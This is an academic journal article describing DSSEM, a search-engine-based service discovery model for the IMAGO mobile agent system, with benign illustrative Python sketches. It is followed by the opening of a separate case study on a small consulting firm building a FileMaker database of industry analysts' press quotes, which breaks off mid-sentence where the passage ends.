BACKGROUND AND MOTIVATION The general idea of distributed services is that an application may be separated from the resources needed to fulfill a task. These resources are modeled as services, which are independent of the application. Services do not denote software services alone but any entity that can be used by a person, a program, or even another service (Hashman & Knudsen, 2001). Service discovery is a new research area that focuses not just on offering plug-and-play solutions but aims to simplify the use of mobile devices in a network, allowing them to discover services and also to be discovered (Ravi, 2001). In general, the service usage model is role-based. An entity providing a service that can be utilized by other requesting entities acts as a provider. Conversely, the entity requesting the provision of a service is called a requester. To provide its service, a provider, in turn, can act as a requester, making use of other services. To form a distributed system, requesters and providers live on physically separate hosting devices. Providers from time to time should advertise services by broadcasting to requesters or by registering themselves on third-party servers. From the requester's point of view, it must do the following:
• Search and browse for services
• Choose the right service
• Utilize the service
Before a service can be discovered, it should make itself public. This process is called service advertisement. The work can be done when services are initialized, or every time they change their states, via broadcasting to anyone who is listening. A service advertisement should consist of the service identifier plus a simple string saying what the service is, or a set of strings for specifications and attributes. An example is given in Table 1.

Table 1. A typical advertisement of service
Identifier: office-printer-4
Type: printer/postscript/HP20
Speed: 24ppm
Colour: yes

There are several ways that a client looks up services that it requires. If the client knows the direct address of services, it can make direct requests, or it can listen to broadcast advertisements and select those that it needs. The common method, however, is that the client forms a description of the desired service and asks a known discovery server whether there is any service matching the request. A variety of service discovery protocols (SDPs) are currently under development by companies and research groups. The most well-known schemes are Sun's Java-based Jini (Sun, 1999), Salutation (Salutation Consortium, 1998), Microsoft's UPnP (Universal Plug and Play, 2000), IETF's draft Service Location Protocol (SLP) (Guttman et al., 1999), and OASIS UDDI (OASIS, 2005). Some of these SDPs are extended and applied by several mobile agent systems to solve the service discovery problem. For example, GTA/Agent (Rubinstein & Carlos, 1998) addresses the service location issue by extending SLP, a simple, lightweight protocol for automatic maintenance and advertisement of intranet services. Though SLP provides a flexible and scalable framework for enabling users to access service information about existence, location, and configuration, it only possesses a local function for service discovery and does not scale up to the global Internet domain, because it uses DHCP and multicast instead of a central lookup mechanism. AETHER (Chen, 2000) makes an improvement to Jini by building a dynamic distributed intelligent agent framework. Jini provides a flexible and robust infrastructure for distributed components to find each other on the Internet. However, it relies on standard Java-based interfaces implemented by both clients and servers. This requires existing systems to be modified for use with Jini, and a significant amount of the production software currently available around the world is unlikely to be modified. After a study of different SDPs and the mobile agent systems that adopt these methods, we found that several problems cannot be solved easily by the existing protocols due to their limitations. First of all, most existing works support attribute-based discovery as well as a simple name lookup to locate a service. Usually, there is only a set of primitive attribute types in the service description, such as string and integer, to characterize a service. Thus, the service discovery process is achieved primarily by type matching, string comparison, or integer comparison. Here, we define a service description as a sequence of flags or codes that can be multicast to service requesters or registered on a third-party server for advertisement purposes. Generally speaking, a service description is composed of two parts: property and access. The property of a service description describes the type, characteristics, constraints, and so forth of a service, which will
be published in the service discovery server for advertising purposes. The access of a service is more complicated. It may contain multiple access method tags, as there could be multiple ways to invoke a service (e.g., using the interface of services, downloading the client-proxy code, locating a database, RPC, RMI, or URL location). For example, Table 2 shows a service description in SLP, where the value of the type tag (i.e., service:printer) indicates the property of the service. It also contains some other property tags to describe this resource in detail, such as paper per minute or color support.

Table 2. Example of SLP service description
type = service:printer
scope = administrator, bmw
name = lj4050
paper per min. = 9
Colour-support = yes
usage = //li4050.com:1020/queue1

In the searching phase, much of the power of SLP derives from its ability to allow exact selection of an appropriate service from among many other advertised services with the same tags. This is done by requesting only the service or services that match the required keywords and attribute values specified by requesters. These keywords and attribute values can be combined into boolean expressions via "AND" and "OR", common comparison operators such as "=", "<", and ">", or substring matching. Considering the previous example again, the search request from a requester could be "<service:printer, bmw, ((name = lj4050)(paper per min. > 8))>". A further step in SDP development is using the eXtensible Markup Language (XML) to describe services. In fact, the Web service discovery protocol UDDI, its description language WSDL, as well as the communication protocol SOAP are all based on XML. In addition, an XML description can be converted to a Java document object model (DOM) so that it can be merged into a service registry system. The example in Table 2 can be described in XML as follows:
<service>
<type>service:printer</type>
<scope>administration, bmw</scope>
<name>lj4050</name>
......
<usage>//li4050.com:1020/queue1</usage>
</service>
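To make the attribute-matching step concrete, the following Python sketch shows how a discovery server could evaluate a request of that kind against a registered description such as the one in Table 2. It is an illustration only, not the actual SLP filter syntax or any code from the systems cited above; the data layout and function names are assumptions.

```python
# Illustrative sketch of SLP-style attribute matching (assumed data layout).

def matches(description, required_type, predicates):
    """Return True if a registered description satisfies the request.

    description: dict of attribute name -> value
    required_type: the service type the requester asks for
    predicates: list of (attribute, operator, value) tuples combined with AND
    """
    if description.get("type") != required_type:
        return False
    ops = {
        "=": lambda a, b: a == b,
        ">": lambda a, b: float(a) > float(b),
        "<": lambda a, b: float(a) < float(b),
    }
    for attr, op, value in predicates:
        if attr not in description or not ops[op](description[attr], value):
            return False
    return True

# Registered description, corresponding to Table 2
printer = {
    "type": "service:printer",
    "scope": "administrator, bmw",
    "name": "lj4050",
    "paper per min.": 9,
    "colour-support": "yes",
    "usage": "//li4050.com:1020/queue1",
}

# Request: "<service:printer, bmw, ((name = lj4050)(paper per min. > 8))>"
query = [("name", "=", "lj4050"), ("paper per min.", ">", 8)]
print(matches(printer, "service:printer", query))   # True
```

Matching of this kind can only work on the attributes a provider chose to register, which is exactly the limitation discussed next for content-rich services such as databases.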
No matter what kind of description format is applied, the lack of rich representation for services has not been changed. The problem arising directly in our project is that these protocols are not adequate to advertise some special services such as database services. A database system already has a well-defined interface, and all a mobile agent requires is a way of finding the location of specific databases and deciding where to move. In this situation, the only way we can accomplish this is by registering the database’s name and attributes for future discovery. However, for a database service, people care more about the content of the database than its name or structure. Considering an example of a bookstore, before placing an order to the bookstore, customers would like to know if the books they require are available in the store by checking the summary of all books with some keywords or a fuzzy search criterion. From this point of view, a simple string identifier or XML identifier cannot meet the requirement. The second problem is ranking. After requesters have searched all services that may be required, they still need to select the right one for utilization. Just imagine that over the entire Internet, tens of thousands of providers could publish their services by their own will. We should be able to know which ones provide the most realistic and highest quality services that users want. Obviously, moving to the hosts one by one to find out the required information is not a wise choice. Therefore, generating a service rank is essential. However, none of the existing SDPs offers such a mechanism for ranking discovered
services. They are satisfied only with finding a service without considering whether the service would be able to serve the requester. The most significant contribution of our research is that we enrich the service description by using Web page’s URL (later the search engine will index the content referenced by this URL) to replace the traditional string-set service description in mobile agent systems. Because of their specific characteristics, such as containing rich media information (text, sound, image, etc.), working with the standard HTTP protocol, and being able to reference each other, Web pages may play a key role as the template of the service description. On the other hand, since the search engine is a mature technology and offers an automated indexing tool that can provide a highly efficient ranking mechanism for the collected information, it is also useful for acting as the directory server in our model. Of course, DSSEM also benefits from previous service discovery research in selected areas but is endowed with a new concept by combining some special features of mobile agents as well as integrating service discovery tools with agent servers.
DISCOVERY SERVICES VIA SEARCH ENGINE MODEL (DSSEM) As the most important media type on the Internet today, hypertext Web pages are posted to advertise the information by industries and individuals. Though millions of them are published on the Internet, these Web pages still increase rapidly every day for a variety of reasons. They are spidered and indexed by commercial search engines such as Google, Yahoo!, AltaVista, and so forth. Users easily can find Web pages’ locations by submitting the search request to those search engines. In principle, if we install a lightweight search engine on the service discovery server that can retrieve Web pages posted by service providers and design a Web search interface for the incom-
ing mobile agents, then the problems described previously could be solved in an easy way. In this situation, service providers don’t need to register the service description on the service discovery server. Instead, they register the URLs of their Web sites that advertise all the information concerning services. As a middleware on the service discovery server, the search engine periodically will retrieve the document indicated in the URLs and all their referencing documents, parse all the tags and words in the documents, and set up the relationship between the keywords and the host address of these service providers. On the other hand, mobile agents can utilize the system interface by accessing the search engine’s database and obtain a destination itinerary that includes a list of ranked host addresses of the service providers. Based on the previous discussion, Figure 1 shows the service discovery process of DSSEM. The current version of DSSEM concentrates on the database service discovery. The database service advertisement information can be converted easily to Web page representation. The specific characteristic of a Web page is that it contains rich media information and flexible layout and can reference each other. As an example in Figure 2, we find that a two-dimensional database table can be converted into a one-dimensional Web page. Moreover, some binary data stored in the database, such as image, can be extracted from higher-dimensional space to a lower-dimensional space as the text representation in the Web page.
Figure 1. Service discovery process of DSSEM
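As a rough illustration of the table-to-Web-page conversion just described, a provider-side script might flatten each database record into plain text on an advertisement page that the discovery server's spider can later index. The sketch below is ours, not code from the IMAGO system; the table name, columns, and page structure are made up.

```python
# Sketch: flatten rows of a "two-dimensional" database table into a
# "one-dimensional" advertisement page suitable for indexing.
import html

books = [
    {"title": "Mobile Agents in Practice", "author": "L. Song", "keywords": "agents, Prolog"},
    {"title": "Databases on the Move", "author": "X. Li", "keywords": "databases, discovery"},
]

def advertisement_page(rows):
    lines = ["<html><body>", "<h1>Bookstore catalogue</h1>"]
    for row in rows:
        # Each record becomes one line of indexable text.
        text = "; ".join(f"{k}: {v}" for k, v in row.items())
        lines.append(f"<p>{html.escape(text)}</p>")
    lines.append("</body></html>")
    return "\n".join(lines)

print(advertisement_page(books))
```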
Figure 2. Web representation of database

To use Web pages as a medium to advertise services for service providers, we should modify the template in the service description of SLP. The remarkable change is that some properties once represented by strings or XML are now represented as a Web site's home URL. Table 3 illustrates a service description template for a bookstore example.

Table 3. An example of service description
type = service:database
name = bookstore
URL = //www.cis.uoguelph.ca/
location(URL) = www.uoguelph.ca
interface = dp_get_set(Handler, 'SQL statement', Result_handler)

The proposed model is similar to SLP and Jini with respect to the service discovery process; however, it extends those protocols by setting up a centralized, seamless, scalable framework on the Internet. Unlike some multicasting service protocols, the centralized service discovery server makes DSSEM service discovery available on the Internet worldwide. The process of registration is similar to UDDI, and the process of discovery is similar to the lookup service in Jini. Besides that, features of mobile agents bring DSSEM other incomparable advantages. First, code mobility is almost impossible in most distributed systems, so a client must download resource drivers to invoke services. Although an RPC or RMI mechanism can help to call services remotely, it might consume tremendous network bandwidth when dealing with services involving a huge amount of data, such as database services. DSSEM goes one step further: it makes agents migrate to the destination hosts and utilize services locally. Second, the security issue is seldom considered in current service discovery protocols. However, a mobile agent server requires strict authorization and authentication when it accepts incoming agents and provides them with services for utilization.
SERVICE DISCOVERY IN THE IMAGO SYSTEM IMAGO is a mobile agent system in which agents are programs written in IMAGO Prolog that can move from one host on the Internet to another. Briefly speaking, an agent is characterized as an entity that is mature (autonomous and selfcontained), mobile, and bears the mental model of the programmer (intelligent) (Li, 2001). From an application point of view, the IMAGO system consists of two kinds of agent servers: stationary server and remote server. The stationary server of an application is the home server where the application is invoked. On the other hand, agents of an application are able to migrate to remote servers. Like a Web server, a remote server must have either a well-known name or a name searchable through the service discovery mechanism. Remote servers should provide services for network computing, resource sharing, or interfaces to other Internet servers, such as Web servers, database servers, and so forth. In fact, an IMAGO server, no matter if it is stationary or remote, is a multithreading logical virtual machine to host agents and provides a protected agent execution environment. The IMAGO system is portable in the sense that its servers run on virtually all Linux boxes with Gnu C compiler and Posix package. Tasks of an IMAGO server
include accepting agents, creating a secure run time environment, and supervising agent execution. It also must organize agent migration from or to other hosts, manage communications among agents, authenticate and control access for agent operations, recover agents and the information carried by them in case of network and computer failures, and provide some basic services for the agents, such as database service and discovery service. The architecture of the IMAGO server is shown in Figure 3. In this architecture, the system modules are configured to deal with different tasks. The core module of the IMAGO server is the scheduler. It maintains an agent list, where each entry on the list matches different stages of the life cycle of an agent, such as creation, execution, memory-related processing (i.e., expansion, contraction, or garbage collection), termination, and migration. The agent list is sorted with respect to system-defined priorities. For example, the highest priority is given to agent migration, followed by agent creation and execution, memory manipulation, and, finally, database service and service discovery. In the early phase of system design, database operation becomes the major service to applications in the IMAGO system. Thus, the problem of service discovery focuses on how to find such services effectively. Once a database server has been found, agents may migrate to that remote server and invoke database access locally through built-in primitives. As an example, the following code shows a typical database access issued by an IMAGO agent: dp_connect(URL, DatabaseName, UserName, Password, AccessMode), //connection dp_get_set(Handler, ‘select …..’, ResultHandler), //data access dp_disconnect(Handler). //disconnection
Figure 3. The infrastructure of IMAGO system
Figure 4. The processes of Web search module

Before a database service is advertised, the service provider should fill out a registration
form and submit the form to an IMAGO service discovery server. The contents of the form include service type, database name, URL of the service provider host, access mode, HTTP URL of the service Web site, interface function, and the verification information. We chose URL as the host address, since it is compatible with most commonly used Web browsers and independent of address families (i.e., IP, IPv6, and IPX). To illustrate how DSSEM works, Figure 4 shows the steps involved in the service registration and discovery process in our IMAGO system. A service discovery server is called the service location host. In order to gather useful information, the search engine, IMAGOSearch, should be installed independently on the service location host. This search engine maintains a special database system designed to index Internet addresses (i.e., URLs, Usenet, Ftp, image locations, etc.). Like traditional search engines, IMAGOSearch consists of three main components: spider, indexer and searcher. They are grouped into two modules, where one module includes spider and indexer, running in the background of a service location host, and the other module is the searcher, running in the foreground to provide discovery services. First, the spider gets the URLs from a URL list that contains initial Web site URLs registered by service providers. The spider then traverses along these URLs in the breadth-first manner and loads the referred hypertext documents into the service discovery
server. The salient words of these documents are extracted by the indexer. Some related information such as text also is saved into the database for user retrieval. In addition, the indexer looks for URL anchors that reference other documents and adds them to the URL list. Besides considering the weight of each word in the documents (e.g., a word occurrence in the title should be assigned a higher weight than that which occurs in the body), IMAGOSearch also pays attention to positions of each word and its relative distance during ranking. The ranking algorithm we use is called the shortest-substring ranking (Charles et al., 2000), which offers a simple way to weight each Web page based on a search criteria and total them up to form Web site ranking. The searcher behaves as a bridge between the IMAGO server and the search engine. It is responsible for accepting the search requests from mobile agents, querying the database, ranking search results, and, finally, returning a destination itinerary. The application programming interface for mobile agents is a built-in predicate; namely, Web_ search(query, number, Result), where query is a compound term, such as locate(“tsx”, “stock transaction”, “imago server”), number is an integer indicating the maximum number of results expected, and Result is a variable to hold the returned values. When an agent issues a Web_search(…) predicate, the agent is blocked,
and control is transferred to the service discovery module of the hosting IMAGO server. This module will communicate with the searcher, wait for search results, and resume the execution of the blocked agent. Search results will be delivered to the agent in the form of a list, where list entries are ranked in terms of priorities from high to low.
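The following Python sketch mimics the indexing and ranking behaviour just described: words from registered pages are indexed with a higher weight for title occurrences, and a query returns provider hosts ranked by total score. It is a simplification of our own for illustration; the weights, page contents, and host names are assumptions, and IMAGOSearch's actual shortest-substring ranking (Charles et al., 2000) is more elaborate.

```python
# A toy word-weight index and ranking in the spirit of the description above.
from collections import defaultdict

TITLE_WEIGHT, BODY_WEIGHT = 3.0, 1.0
index = defaultdict(dict)          # word -> {host: accumulated score}

def add_page(host, title, body):
    for word in title.lower().split():
        index[word][host] = index[word].get(host, 0.0) + TITLE_WEIGHT
    for word in body.lower().split():
        index[word][host] = index[word].get(host, 0.0) + BODY_WEIGHT

def web_search(keywords, number):
    """Return up to `number` provider hosts ranked by total keyword score."""
    scores = defaultdict(float)
    for word in keywords:
        for host, score in index.get(word.lower(), {}).items():
            scores[host] += score
    return sorted(scores.items(), key=lambda item: item[1], reverse=True)[:number]

add_page("draco.cis.uoguelph.ca", "IMAGO lab database services",
         "stock transaction data hosted by the imago lab")
add_page("www.uoguelph.ca", "University of Guelph",
         "general information with one mention of the imago lab")

print(web_search(["imago", "lab"], 2))
# [('draco.cis.uoguelph.ca', 8.0), ('www.uoguelph.ca', 2.0)]
```

In the IMAGO system itself, the returned list is handed back to the blocked agent as its destination itinerary, ranked from high to low priority.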
DISCUSSION AND CONCLUSION In this article, we have discussed the design of a service discovery protocol—DSSEM—and its implementation in the IMAGO system. Table 4 summarizes the main features of selected protocols compared with DSSEM. From an implementation point of view, the most critical issue about the performance of a search engine is the quality of search results. However, we cannot make a comparison with other major commercial search engines, since they are operating at different levels. Thus, user evaluation is beyond the scope of this article. In order to show that our search engine does return useful information, Table 5 gives the experimental results for a query using the keywords imago lab. The results show that all server URLs have come from reasonably high-quality Web sites, and, at last check, none were broken links. An Rw value is calculated according to word
Table 5. Search results for imago lab keyword
draco.cis.uoguelph.ca | Rw = 13.8 | 100%
www.cis.uoguelph.ca | Rw = 10.65 | 77%
www.uoguelph.ca | Rw = 4.6 | 33%
www.cas.mcmaster.ca | Rw = 4.23 | 30.6%
occurrence, weight, and a factor value measuring the distance of keywords by a ranking algorithm (Charles et al., 2000). We define the result that has the highest Rw value as the highest priority and assign it a 100% rate; therefore, the percentage of other results are rated relatively. Of course, a true test of the quality of a search engine would involve extensive experiments, analysis, and user evaluation, which is part of our future work. Aside from the search quality, IMAGOSearch is designed to scale up cost effectively, as the sizes of Web pages grow. Because IMAGOSearch only indexes Web servers registered by IMAGO Server users, we do not need to worry about indexed pages exceeding the maximum size of the database. One endeavor that we are undertaking is to reduce the table redundancy and to use the storage efficiently. Our experiment shows that indexing 22,000 different documents consumes only 140Mb disk space. The search time is dominated mostly by the performance of CPU, disk I/O, and the underlying database system.
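The percentage column of Table 5 follows directly from the Rw values; the short check below re-derives it (our own arithmetic, not code from the article):

```python
# Re-deriving the relative ratings of Table 5 from the reported Rw values.
results = {
    "draco.cis.uoguelph.ca": 13.8,
    "www.cis.uoguelph.ca": 10.65,
    "www.uoguelph.ca": 4.6,
    "www.cas.mcmaster.ca": 4.23,
}
best = max(results.values())
for host, rw in results.items():
    print(f"{host}: {100 * rw / best:.1f}%")
# 100.0%, 77.2%, 33.3%, 30.7% -- matching the rounded figures in Table 5
```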
Table 4. Comparison of different SDPs
Feature | SLP | Jini | Salutation | UPnP | DSSEM
Network transport | TCP/IP | Independent | Independent | TCP/IP | SITP
Programming language | Independent | Java | Independent | Independent | Independent
OS and platform | Dependent | Independent | Dependent | Dependent | Dependent
Code mobility | No | On demand | No | No | Yes
Srv attributes searchable | Yes | Yes | Yes | No | Yes
Leasing concept | Yes | Yes | No | Yes | Yes
Event notification | No | Remote event | Periodic and automatic | Publish events | No
Security | No | Java based | Authentication | No | Strict
Service description and scope | Service type and attribute matching | Interface type and attribute matching | Functional units and attributes within it | Description in XML | Web page description and fuzzy matching
When a mobile agent wants to locate certain services, it first must move to the service discovery server and then make a local query and migrate to the destination hosts after obtaining the itinerary. This brings us to the problem that, as a central unit, the service discovery server might become a bottleneck, especially when it is handling thousands of Web pages every day and simultaneously hosting as many incoming mobile agents as possible. A possible solution is to duplicate service discovery servers. Replicas not only make the service discovery mechanism very efficient but also increase the ability of fault tolerance. The results of our work are encouraging, and further studies in this field are being planned. First, the current implementation of search engine deals with only the AND logical relationship between search strings; it could be enhanced to parse some complex search criteria that combine keywords with boolean expressions (AND, OR) and conditional expressions (=, substring match, etc.). Second, since a database contains multidimensional information, how to reflect dimensional relationship by a flat Web page is a big challenge. A possible way to address this issue is to use XML metadata to describe the database dimension.
ACKNOWLEDGMENT We would like to express our appreciation to the Natural Science and Engineering Council of Canada for supporting this research.
REFERENCES Baumer, C., Breugst, M., & Choy, S. (1999). Grasshopper—A universal agent platform based on OMG MASIF and FIPA standards. In Proceedings of the First International Workshop on Mobile Agents for Telecommunication Applications (MATA'99) (pp. 1-18).
Bettstetter, C., & Renner, C. (2000). A comparison of service discovery protocols and implementation of the service location protocol. In Proceedings of EUNICE 2000, Sixth EUNICE Open European Summer School, The Netherlands.
Charles, L., Clarke, A., & Gordon, V. (2000). Shortest substring retrieval and ranking. ACM Transactions on Information Systems, 44-78.
Chen, H. (2000). Developing a dynamic distributed intelligent agent framework based on Jini architecture. Master's thesis, University of Maryland, MD.
FIPA. (2002). Agent management specification. Retrieved from http://www.fipa.org
Gray, R., Cybenko, G., & Kotz, D. (2002). D'Agents: Applications and performance of a mobile-agent system. Software—Practice and Experience, 32(6), 543-573.
Guttman, E., Perkins, C., & Veizades, J. (1999). Service location protocol, version 2 (white paper). IETF, RFC 2608.
Hashman, S., & Knudsen, S. (2001). The application of Jini technology to enhance the delivery of mobile services (white paper). Retrieved from http://wwws.sun.com/
John, R. (1999). UPnP, Jini and Salutation—A look at some popular coordination frameworks for future network devices (technical report). California Software Labs.
Lange, D., & Ishima, M. (1998). Programming and deploying Java mobile agents with Aglets. Addison-Wesley.
Li, X. (2001). IMAGO: A Prolog-based system for intelligent mobile agents. In Proceedings of Mobile Agents for Telecommunication Applications (MATA'01), Lecture Notes in Computer Science (pp. 21-30). Springer-Verlag.
Li, X. (2003). IMAGO Prolog user's manual, version 1.0 (technical report). University of Guelph.
Recursion Software Inc. (2005). Voyager product documentation. Retrieved from http://www.recursionsw.com/voyager_Documentation.html
Milojicic, D., Breugst, M., & Busse, I. (1998). MASIF: The OMG mobile agent system interoperability facility. Proceedings of the Second International Workshop on Mobile Agents (pp. 50-67).
Rubinstein, M., & Carlos, O. (1998). Service location for mobile agent system. Proceedings of the IEEE/SBT International Telecommunications Symposium (ITS’98) (pp. 623-626).
Mitsubishi Electric ITA. (1998). Mobile agent computing (white paper).
OASIS UDDI. (2005). UDDI (white paper). Retrieved from http://www.uddi.org
Ravi, N. (2001). Service discovery in mobile environments (technical report). Arlington, TX: University of Texas at Arlington.
Salutation Consortium. (1998). Salutation architecture overview (white paper). Retrieved from http://www.salutation.org/whitepaper/originalwp.pdf
Sun Technical. (1999). Jini architectural overview (white paper). Retrieved from http://www.sun.com/jini/
Universal Plug and Play Forum. (2000). Universal plug and play device architecture, version 0.91 (white paper).
This work was previously published in International Journal of Intelligent Information Technologies, Vol. 2, Issue 2, edited by V. Sugumaran, pp. 16-29, copyright 2006 by IGI Publishing(an imprint of IGI Global).
Chapter 2.4
A Database Project in a Small Company
(or How the Real World Doesn't Always Follow the Book)
Efrem Mallach, University of Massachusetts Dartmouth, USA
EXECUTIVE SUMMARY The case study describes a small consulting company’s experience in the design and implementation of a database and associated information retrieval system. Their choices are explained within the context of the firm’s needs and constraints. Issues associated with development methods are discussed, along with problems that arose from not following proper development disciplines.
INTRODUCTION This case describes the development of a database system used to track and analyze press comments by experts on the information technology industry. The system was developed in a haphazard fashion, without the benefit of professional developers, originally based on a loosely organized collection of data assembled by a staff member, with little visibility into its ultimate uses. Design decisions made early in the project without careful consideration were difficult to change, or were never changed later, even after their negative impact was evident. The system provided real value to its users, but use of proper development disciplines could possibly have reduced some problems while not reducing that value.
ORGANIZATION BACKGROUND The job of an industry analyst (Columbus, 2004) is to interpret goings-on in a particular field to nonexperts, advising them on where the field is going and which vendors, products, or services are most likely to suit a particular user need. Because information and communication technologies (ICTs) are complex, rapidly changing, and "mission-critical" to businesses of all types, analysts1 are especially important in that field.
Their recommendations move large amounts of revenue toward vendors whose products and services they favor, or away from those about whom they feel negatively. In 2005, there are about 500 (Kensington Group, 2004) industry analysis firms (also known as research firms when this is unlikely to cause confusion with other types of research) worldwide. Total industry revenue can be estimated at roughly $3 billion, based on published annual revenue of industry leader Gartner being about $900 million (Gartner Group, 2005), and the existence of several privately held firms employing over 100 analysts each, such as International Data Corporation with over 600 (IDC, 2005) and Forrester Research with nearly 200 (Forrester, 2005). It is reasonable to estimate that the industry employs at least 2,000 analysts, probably considerably more. As a result of analysts’ influence on the market, ICT vendors pay a great deal of attention to them. Most large vendors have a dedicated analyst relations department. The efforts of Alcatel (2005), Computer Associates (2005), Sybase (2005), and Hewlett-Packard (2005), all in different segments of the IT industry, are representative. Vendors spend large sums courting analysts, visiting them, putting on events for them at which they showcase their products, and generally trying to convince them that the vendor’s offering is superior. Since they want to do this as well as possible, vendors often look to outside advisors (Insight Marketing, 2005; Tekrati, 2005) to evaluate and improve their analyst relations programs. The organization discussed in this case, which will be referred to2 as Balmoral Group, Inc., was such a consulting firm. It specialized in advising ICT vendors about the impact of industry analysts on their business, and on how to work with them most constructively. As the case opens in 1999, it employed 5 full-time people plus a few part-time contractors for peak survey work. At the end of the case in the summer of 2003, it employed 18, over half of whom were primarily involved with the system described here.
Balmoral Group was founded when its two cofounders, Isabelle Oliviera and Lawrence Ackerman, met. Ackerman had a solo consulting practice in this field. Among other things, he had begun conducting multiclient studies in which analysts told him what they needed in terms of support from vendors, and rated vendors based on how well they provided this support. Oliviera worked for a large hardware vendor and was about to leave it to start her own consulting practice in the same field. Since the two were on opposite coasts of the U.S., they chose to join forces and named their joint venture Balmoral Group. Ackerman was named CEO; Oliviera president. A few years later, in 1996, they incorporated to set the stage for further expansion. The firm’s initial offerings included the multiclient studies originally done by Ackerman, workshops at which vendor analyst relations professionals could learn the elements of their profession, and custom consulting services. Among the questions that arose frequently in consulting work were “Which analysts are most influential in our space, which are most likely to be quoted about us, and what are they saying?” Balmoral Group, at that time, lacked a systematic way to approach these questions. The database system described in the rest of this case was originally intended to answer such questions. It eventually provided another offering for the firm that accounted for a large fraction of its income by 2002 and led to expanding its headcount to over 15 people. However, its development proceeded in an unplanned fashion and was characterized by technical decisions that, in retrospect, might better have been made differently. The situation described in the case is in this respect typical of many small organizations. The system development processes described in books are often followed, at least in principle, by larger firms with dedicated MIS staffs, but the smallbusiness reality is not usually as professional in that respect.
Oliviera and Ackerman remained in charge of the firm through 2002. In 2000 they divided their responsibilities, with Oliviera in charge of external activities including sales and customer relations, and Ackerman in charge of internal ones including research projects and databases. In early 2002, Oliviera took over as sole manager while Ackerman prepared for a career change. As a prearranged part of this orderly transition, he remained with the firm through the period covered by this case, leaving in the summer of 2003. Other than the two cofounders, only one other employee had any management responsibilities. In 2000, a research staff member, Tamara Hudson, was given the title of project manager and put in charge of many of the database activities described later in this case. Because of the small size of the organization—18 people at most, about half of them working in support positions on the database described in this case—more of a formal management structure was not necessary. Figure 1 shows an organization chart of the firm
as it was toward the end of this case. At that time its annual revenue was in the high six figures in U.S. dollars. Strategic planning as such did not exist at Balmoral. At the start of the case and for most of its existence, it had no direct competition. Some public relations agencies offered overlapping services, but Balmoral’s specialization in analyst relations tended to remove general agencies from direct competition. In addition, since Balmoral had a policy not to offer agency services to its clients, agencies tended to treat it more as a partner than as a competitor. Balmoral had a multiplatform policy for its information technology. Staff members (almost all of whom worked from their homes) could choose either Windows3 or Macintosh systems, as they preferred. There was no consistency in individual choices of hardware or OS. The firm reimbursed employees for whatever they chose. Consistency existed at the application level, however. The firm required multiplatform applica-
Figure 1. Organization chart of Balmoral Group: Lawrence Ackerman, CEO; Isabelle Oliviera, President; Christine Hardy, Admin. Asst.; Research Analysts; Sandi Carpenter, Database Coord.; Tamara Hudson, Project Manager; Readers
tions. It used Microsoft Office for word processing, spreadsheets, and presentations; PageMaker for document layout; and Dreamweaver for Web page development. E-mail and Web browser software were not standardized as that was not required for interoperability. With occasional exceptions involving graphics embedded in Word documents, the multiplatform approach caused no problems.
SETTING THE STAGE In early 1999, CEO Ackerman was reading InfoWorld while waiting between flights in the American Airlines lounge at Chicago's O'Hare Airport. While he was used to seeing analysts quoted frequently in the trade press, for the first time he realized that listing and organizing their comments could provide insight into their influence areas. He opened his laptop and created a spreadsheet to capture information about these quotes. It had these columns:
• Analyst Name
• Job Title
• Firm
• Location (city; also state if U.S., country if not U.S.)
• Topic of Article (a few words indicating what the article overall was about)
• Article Title
• Publication Name
• Date of Issue, Volume, Number (as applicable)
• Writer(s)
• Point(s) Made (summary of what the analyst was quoted as saying)
• Vendor(s) Mentioned
• Entered by (initials, for the possibility that others might enter quotes at some time)
• Date Entered
The spreadsheet version of this listing is seen in Figure 2. Some information items, such as an analyst’s job title, are not always available. Those cells were left blank. In Excel, this permits information from the cell to its left to spill over into the blank cell, as do the first two analysts’ names. Common publication names were abbreviated, for example “CW” for Computerworld in several rows. A few months later, at a company meeting, Ackerman showed the spreadsheet to his colleagues. By that time it had grown to a few hundred entries, all gathered through his reading of the trade press. The group agreed that the information in it, or that could be in it with a concerted effort to continue and expand its coverage, could be a valuable tool. Its availability, presented as evidence that Balmoral Group’s recommendations are based on hard data, could also provide a competitive edge in obtaining clients. However, the spreadsheet did not lend itself to these uses. It suffered from all the problems of a flat-file structure in what ought to be a multitable database. It had no retrieval facilities other than the text-search capability of its underlying package (Excel, at the time in versions 97 and 98 for Windows and Mac OS, respectively). Finally, the group came up with other data elements that were not being captured but which could be useful, such as the attitude (positive, neutral, or negative) expressed in a quote toward each vendor mentioned in it. As a result, it was decided to develop a “real” database for quotation capture and analysis. Since Ackerman had more background in this area than anyone else then in the small firm, though he was far from an expert, he offered to develop the system, with the others testing it and providing feedback. Balmoral Group’s multiplatform philosophy, and the fact that they had no database server capability at the time, narrowed down the choice of DBMS to FileMaker Pro (FM Pro for short) (Coffey, 2005; FileMaker, 2005; Schwartz & Cohen, 2004). Release 5 was then current and
Figure 2.
was used. Release 6 appeared during the period covered by this case, but was not felt to offer enough advantages to justify upgrading. (Release 7, which did offer major conceptual improvements, came out later.) An informal version of prototyping4 was used for development. Ackerman bypassed conventional methods for requirements determination5. Instead, he intuited system requirements from his experience with the Excel spreadsheet and from colleagues’ comments. Along similar “quick and dirty” development lines, no functional or design specifications were written. Ackerman developed a “first cut” system, populated it with quotes imported from his spreadsheet, and sent it to colleagues to try out, review, and comment.
CASE DESCRIPTION The first FileMaker Pro version of the database implemented the entity-relationship diagram in Figure 3.
This ERD was not drawn at that time. It is an after-the-fact description of the original database. It represented these facts:
• An analyst may be quoted many times, but each quote is by one analyst. (A handful of exceptions arose later, where a reporter attributed a quote to two or more analysts. Most of these were excerpts from reports by multiple authors. These were handled as multiple quotes, one by each author, with identical content and cross-reference(s) to the other author(s) in the "article summary" text field.)
• A firm may employ many analysts, but each analyst is employed by one firm. (Job changes result in updating the analyst's record with his or her new employer. This system was not intended to, and did not, store analysts' complete employment histories. There was a text field in each analyst record where freeform information about previous employers could be entered if desired.)
Figure 3. ERD of the original database (entities: Quote, Analyst, Office, Firm)
• A firm may have many offices, but each office belongs to one firm. (Two firms may have offices at the same place, such as when one is a subsidiary of the other that does business under its own name, but these were considered conceptually separate.)
• An office may house many analysts, but each analyst works at one office. (An analyst whose work location varies, such as a telecommuter, is associated with only one location in the database.)
It may seem that linking an analyst to a firm is not strictly necessary, since an analyst is at an office, which in turn belongs to a firm. This link exists because analysts' office locations are not always known. Many quotes identify the speaker's employer, but not his or her location. While it is usually possible to find it with a little detective work, it is not always worth the time to do so, and not always possible when a quote is being entered, such as when reading a newspaper on a plane. A more detailed ERD would show this relationship as optional—an analyst is located at zero to one offices—while that of an analyst to a firm is mandatory, with a minimum cardinality of one on the firm side. Keys to these four tables were as follows:
